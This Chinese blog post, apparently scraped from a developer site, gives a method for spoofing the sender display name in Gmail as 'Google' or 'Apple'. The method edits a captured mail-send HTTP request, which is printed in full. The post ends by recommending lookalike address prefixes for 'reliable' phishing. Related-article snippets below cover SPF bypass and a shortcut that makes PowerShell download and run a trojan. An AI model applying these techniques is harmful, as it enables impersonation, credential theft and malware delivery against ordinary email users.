绕过Gmail授权伪造官方发送钓鱼邮件

最新推荐文章于 2024-03-20 16:36:13 发布
最新推荐文章于 2024-03-20 16:36:13 发布
阅读量1.1k 收藏
点赞数 1
文章标签: chrome 前端
原文链接:https://www.nauyx.com/forum.php?mod=viewthread&tid=5
版权

因为谷歌的一些限制,我们注册的时候,并不能注册一些特殊用户名,比如加入特殊字符和注册Google等等,但是可以通过绕过谷歌限制,将邮件发送人的名字准确的改为:“Google” “Apple”等等官方。

概念证明

img

绕过限制

在发送邮件的时候抓包。

POST /sync/u/0/i/s?hl=zh-CN&c=22 HTTP/2
Host: mail.google.com
Cookie: COMPASS=x x x x x x x x x x x x x x x x x x x x x x x x x
Content-Length: 656
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
X-Framework-Xsrf-Token: xxxxxxxxxxxxxxxxxxxxx
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/json
X-Google-Btd: 1
X-Gmail-Btai: {"3":{"6":0,"10":1,"13":1,"15":0,"16":1,"17":1,"18":0,"19":1,"22":1,"23":1,"24":1,"25":1,"26":1,"27":1,"28":1,"29":0,"30":1,"31":1,"32":1,"33":1,"34":1,"35":0,"36":1,"37":"zh-CN","38":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36","39":1,"40":0,"41":25,"43":0,"44":1,"45":0,"46":1,"47":1,"48":1,"49":1,"50":1,"52":1,"53":1,"54":0,"55":1,"56":1,"57":0,"58":0,"60":0,"61":1,"62":0,"63":1,"64":1,"66":1,"67":1,"69":1,"70":0,"71":1,"72":0,"73":1},"5":"cef43d678f","7":25,"8":"gmail.pinto-server_20220225.06_p1","9":1,"10":5,"11":"","12":28800000,"13":"+08:00","14":1,"16":431522263,"17":"","18":"","19":"xxxxxxxxxxxxxxx","21":"11874"}
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://mail.google.com
X-Client-Data: xxxxxxxxxxxxxxxxxxx
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mail.google.com/mail/u/0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

{"2":{"1":[{"1":"5","2":{"1":"thread-a:r-xxxxxxxxxxx","2":{"14":{"1":{"1":"msg-a:r-xxxxxxxxxxx","2":{"1":1,"2":"xxxxxxx@gmail.com","3":"google","10":"xxxxxxx@gmail.com"},"3":[{"1":1,"2":"收件人@qq.com"}],"7":"xxxxxx","8":"hack by xinba","9":{"2":[{"1":0,"2":"<div dir=\"ltr\">1234</div>"}],"7":1},"11":["^all","^pfg","^f_bt","^f_btns","^f_cl","^a"],"18":"xxxxxxxxxxx","36":{"6":0},"37":{"4":0},"42":0,"43":{"1":0,"2":0,"3":0,"4":0},"52":"s:xxxxxxxxx|#msg-a:r-952505133084427487|0"},"3":1}}}}]},"3":{"1":1,"2":"11874","5":{"2":0},"7":1},"4":{"1":"xxxxxxxx","2":1,"3":"xxxxxxxxx","4":1,"5":70},"5":2}

看看效果,对比一下真实的Apple和QQ阅读的邮件,顺便说一句,我用的qq邮件接收的,最上面的Google是我们刚刚伪造发送的邮件。

img

在重新注册一个email邮箱,在邮箱的前缀上面做点文章,钓鱼稳当可靠。

「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
最近Gmail中经常收到钓鱼邮件
Ghoul To World!
07-21 458
最近一段时间,我的gmail中经常收到钓鱼邮件和一些其它的垃圾邮件,最有代表性的就是说Gmail小组通知你你的帐号中奖了云云,我朋友中很多人也称遇到同样的事情。   Gmail的反垃圾能力降低了? 想不通。   上个图,今天收到封垃圾邮件,标题的确写得挺那么回事,看了很想点开,结果里面很有趣,我不太相信有哪个人愿意从这一堆中找出这个发送者想要推销的信息,这种垃圾邮件发送者,大概是伍佰的弟...
如何伪造一封合格的钓鱼邮件
甘焕的博客
11-07 2万+
有幸参与了公司安全周之钓鱼邮件的策划与开发,虽然持续时间很短,但收获较大,主动点击邮件链接的人数超过了20%,主动提交密码的也超过了7%,说明提高安全意识之路还任重道远,更重要的是,从小伙伴的反馈中,钓鱼邮件要想达到合格,还有很多可以提高的地方。1. 必须满足的条件 必须能够顺利穿越反垃圾邮件防火墙,含邮件内容与邮件标题; 图片一定要高清,并且能自动适应所有邮件客户端; 邮件发送地址一定要有高度相似
社工实验:邮件钓鱼
蚁景网安学院
01-11 1850
点击上方蓝色字体,关注我们数据泄露事件与社会工程学事件和鱼叉式网络钓鱼攻击有关。网络钓鱼攻击通常是电子邮件钓鱼,然后骗取受害者点击恶意链接,最后使用恶意的漏洞Payload攻击受害者计算...
伪造谷歌安全类的钓鱼邮件案例
ningyanggege的博客
04-15 429
红蓝对抗之邮件伪造
xnxqwzy的博客
09-13 2591
SPF(Sender Policy Framework),它是以IP地址认证电子邮件发件人身份的技术。邮件接收方会检查我们的MailFrom下的域名,并去检查该域名的spf记录,如果spf记录存在,就会把邮件发送者的ip与spf记录进行匹配,如果匹配成功就认为是正确的邮件,否则则认为该邮件伪造的,将邮件按照规则进行处理这样攻击者可以假装这个域下的所有其他用户,伪造该域下用户可以直接无视所有验证协议。
SPF邮件伪造漏洞利用及反邮件伪造技术学习
最新发布
2301_79837041的博客
03-20 1976
之前只是听说了能伪造邮件后缀进行钓鱼......后来偶然在其他师傅那边了解到邮件伪造漏洞......我就就就就浅浅复现学习了一下!特此对学习到的内容做一个梳理和记录~首先,目前很多邮件用的是简单邮件传输协议SMTP进行通信,但是由于这个协议本身没有很好的安全机制,这也让很多不法分子钻了空子进行钓鱼诈骗。我们先来了解一下SPF是什么,以及怎么用?SPF这个东西的全名是(Sender Policy Framework, SPF),是一个电子邮件验证的机制。
我是程序猿:Windows能被感染?最常见的恶意电子邮件附件
C语言C++学习俱乐部:765860056
10-21 1690
引语:为了确保网络安全,每个人都需要识别出那些经常被用来传播恶意软件的仿冒电子邮件附件。 为确保网络安全,每个人都需要识别出那些经常被用来传播恶意软件的钓鱼电子邮件附件。 在恶意软件传播的过程中,攻击者会将垃圾邮件伪装为发票、邀请、支付信息、交通信息、电子邮件、语音邮件等等。在打开或启用了宏之后,这些电子邮件中包含恶意的 Word和 Excel附件或链接,这些附件将在计算机上安装恶意软件。 但 Office要求您在执行 Word或 Excel中的宏之前,先点击“启用编辑”或“启用内容”按..
网络钓鱼检测:多层次模型PhiDMA的原型实现及准确率分析
库普萨米计算机科学系,工程与技术学院,本地治里大学,本地治里605014,印度阿提奇莱因福奥文章历史记录:2017年4月19日收到2017年7月3日修订2017年7月17日接受2017年7月23日在线发布保留字:网络钓鱼信息安全可...
红队渗透测试技术:如何通过鱼叉式网络钓鱼获得攻击机会?
systemino的博客
11-07 1016
关于红队在渗透测试中使用的网络钓鱼攻击的文章很多,不过大多数的介绍都是不完整的。在本文中,我们将对这个话题进行一次完整的梳理,包括域创建,制作网络钓鱼内容,绕过垃圾邮件过滤器和电子邮件网关,生成不可检测的有效载荷以及绕过Windows保护(例如AMSI)的注意事项。另外,我们还在这篇文章的末尾整理了一份参考文献,如果你感兴趣可以参考。 出于安全原因,渗透测试中的客户名称和相关信息已被匿名化。...
电子邮件伪造
zy010101博客
03-18 5347
电子邮件伪造是指发送者故意篡改邮件头部信息,以使邮件看起来似乎是来自另一个人或组织的行为。这种行为可能用于欺骗、诈骗、垃圾邮件发送等目的。
常用的邮件钓鱼伪装方法
m0_61869253的博客
08-10 1089
修改快捷方式中的目标栏内容执行powershell命令下载木马将以下内容写入目标栏中&cmd调用powershell,隐藏窗口执行下载网站的EXE恶意文件,存储到某一文件夹下,命令行运行EXE恶意文件隐藏恶意文件,利用命名及图标伪装的快捷方式诱导点击将真实要执行的恶意文件进行隐藏(此步骤可选)创建快捷方式指向该文件,修改目标内容为explorer.exe .\evil.exe 将起始位置内容删除。
几个好用的邮件伪造工具
weixin_50464560的博客
03-22 1万+
工欲善其事必先利其器,我们来介绍两款用于邮件伪造的测试工具,实现伪造任意用户邮箱。SimpleEmailSpoofer这是一个很简单的python脚本,帮助渗透测试人员进行电子邮件伪造。Github项目地址:https://github.com/lunarca/SimpleEmailSpoofergit clone https://github.com/lunarca/SimpleEmailSpoofer.git cd SimpleEmailSpoofer/ pip install -r requireme
邮件伪造之SPF绕过的5种思路
05-17 2万+
SMTP(SimpleMail Transfer Protocol)即简单邮件传输协议,正如名字所暗示的那样,它其实是一个非常简单的传输协议,无需身份认证,而且发件人的邮箱地址是可以由发信方任意声明的,利用这个特性可以伪造任意发件人。SPF 出现的目的,就是为了防止随意伪造发件人。SPF,全称为 Sender Policy Framework,是一种以IP地址认证电子邮件发件人身份的技...
网安工具系列:几个好用的邮件伪造工具
weixin_54626591的博客
01-13 2799
工欲善其事必先利其器,我们来介绍两款用于邮件伪造的测试工具,实现伪造任意用户邮箱。
如何在线伪造邮箱发件人,用任意邮箱发送邮件
热门推荐
03-19 2万+
今天邮箱收到一封自己域名发过来的邮件,但是询问当事人说并没有发送相关邮件,于是去百度了下,看是否可以伪造发件人,于是找到一个网站http://tool.chacuo.net/mailanonymous,这个网站可以用任意的邮箱地址发邮件,于是我测试了一封发给我的QQ邮箱,果然收到了,但是在垃圾邮箱,我又发送另外一封邮件到微软邮箱,但是显示发送失败 我去百度了下,因为SMTP协议不需要身份认证,所以可以伪造,但是如果域名加了SPF记录,接收邮件方会根据你的SPF记录来判断发送过来的IP地址是否被包含在.
如何发送伪造的电子邮件
java技术交流
02-16 2378
最近在看有关协议分析的资料,其中谈到了邮件传输协议(SMTP)的工作原理,深受感触。之后在网上又搜索了一些相关的资料,大概的整理了一下,希望对大家有帮助,有不对的地方请批评指正。 对照此方法可以检验你的邮件服务器是否有此方面的安全缺陷。对用此方法而引起的后果自负(如需转载,请注明信息来源) 一、SMTP 邮件的传输    共分为三个阶段:1、建立连接2、数据传输3、连接关闭 ...
程序员伪造邮件钓鱼,从入门到入土!
程序IT圈
03-09 5543
邮件钓鱼入门到入土在大型企业边界安全做的越来越好的情况下,不管是 APT 攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。一、邮件安全的三大协议1.1 SPFSPF 是 Sender...
实验整理(一)——钓鱼邮件攻击实验
weixin_57882885的博客
06-23 1万+
一.实验介绍简介 本次课程实验中主要是通过发送qq邮件来进行的一个钓鱼邮件实验。我是通过在kali上部署好的gophish工具向自己的一个QQ邮箱发送一个简单的电子邮件来模拟操作这次实验,并且还可以通过gophish来监测收到钓鱼邮件的收件人的状态。 本次实验中使用的时kali-Linux-2021.2 -vnware-amd64,以及Windows 10 还有用到了QQ邮箱。还有部署在kali下的gophish钓鱼工具。二.gophish的安装1.下载地址:https://gi
Linux系统利用Gmail SMTP发送邮件教程
只需在相应代码中填入上述SMTP服务器的详细信息,程序便能通过Gmail发送邮件。 然而,值得注意的是,Google可能会对频繁使用SMTP服务的账户进行验证,要求用户通过网页登录以确认不是机器人。另外,为了防止被视为...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值